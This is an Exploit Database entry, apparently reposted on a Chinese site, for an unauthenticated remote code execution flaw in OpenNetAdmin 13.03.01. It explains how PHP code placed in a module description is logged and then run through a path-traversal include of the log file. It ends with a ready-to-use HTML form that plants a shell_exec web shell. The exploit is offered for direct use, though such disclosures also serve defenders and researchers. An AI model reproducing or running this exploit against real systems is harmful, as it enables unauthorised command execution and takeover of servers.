OpenNetAdmin 13.03.01 – Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Mandat0ry
  日期： 2013-07-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/26682/

• # Exploit Title: OpenNetAdmin Remote Code Execution
  # Date: 03/04/13
  # Exploit Author: Mandat0ry (aka Matthew Bryant)
  # Vendor Homepage: http://opennetadmin.com/
  # Software Link: http://opennetadmin.com/download.html
  # Version: 13.03.01
  # Tested on: Ubuntu
  # CVE : No CVE exists - 0day exploit - probably works on the demo on
  their site as well! So they should be alerted.
  
  OpeNetAdmin Remote Code Execution Exploit by Mandat0ry (aka Matthew Bryant)
  
  Info:
  This exploit works because adding modules can be done without any sort
  of authentication.
  
  Modules are in this form:
  module[name] = The name of the function that will be run out of the
  included file
  module[description] = Irrelevant description of the module (unless
  some PHP code is injected here hmm?)
  module[file] = The file to be included and then the function
  module[name] will be run from this included file
  
  This exploit works by injecting some PHP code into the
  /var/log/ona.log file via the module description parameter.
  Everytime a module is added to OpenNetAdmin the description/name/etc
  are all logged into this log file.
  
  So...
  
  By simply setting the module filepath to
  "../../../../../../../../../../../var/log/ona.log" (add or remove dots
  at will) we can include the log file as a module. Where it gets clever
  is remember the description is logged! So we can add PHP code into the
  description and thus the logs and it will be executed on inclusion of
  this file! The PHP interpreter will ignore everything not enclosed in
  PHP tags so it will only run the code we inject. This is basically a
  spin off of Apache log injection exploitation. Once the module has been added all you have
  to do is run it via "dcm.php?module=". This all works without any
  guest account etc.
  
  NOTE: Because of the way the logger script works we cannot use any "="
  in our injected code as it will be escaped before being added to the
  logs ("\=") so avoid using it!
  
  Cool software but the code has a lot to be desired, I imagine their
  are a LOT more exploits than what I found but once I had RCE I was
  satisfied.
  
  Proof of concept code for easy exploitation. Run this and then go to
  http://URLHERE/ona/dcm.php?module=mandat0ry for your shell!
  
  <center>
  <head>
  <title>0wned Your Network</title>
  <script type="text/javascript">
  function changeaction()
  {
  document.sploit.action = document.getElementById("url").value;
  alert('Remember, your shell must be accessed via
  '+document.getElementById("url").value+'?module=mandat0ry');
  }
  </script>
  </head>
  <font size="5">OpenNetAdmin RCE Exploit</font><br />
  <font size="2"><i>Now with leet button sploiting action! (oooh,
  ahhh!)</i></font><br /><br />
  <form action="/" method="post" name="sploit" onsubmit="changeaction()" >
  URL: <input id="url" value="http://127.0.0.1/ona/dcm.php" size="50" /><br />
  PHP Code to Execute: <input type="text" size="50" name="options[desc]"
  value="<?php echo shell_exec($_GET[1]) ?>"/> <br />
  <input type="hidden" name="module" value="add_module" />
  <input type="hidden" name="options[name]" value="mandat0ry" />
  <input type="hidden" name="options[file]"
  value="../../../../../../../../../../../var/log/ona.log" />
  <input type="submit" value="Exploit!" />
  </form>
  <b><i>Special thanks to: offsec, twitches, funkenstein, zachzor,
  av1dmage, drc, arsinh, and the coders for OpenNetAdmin!</i></b>
  </center>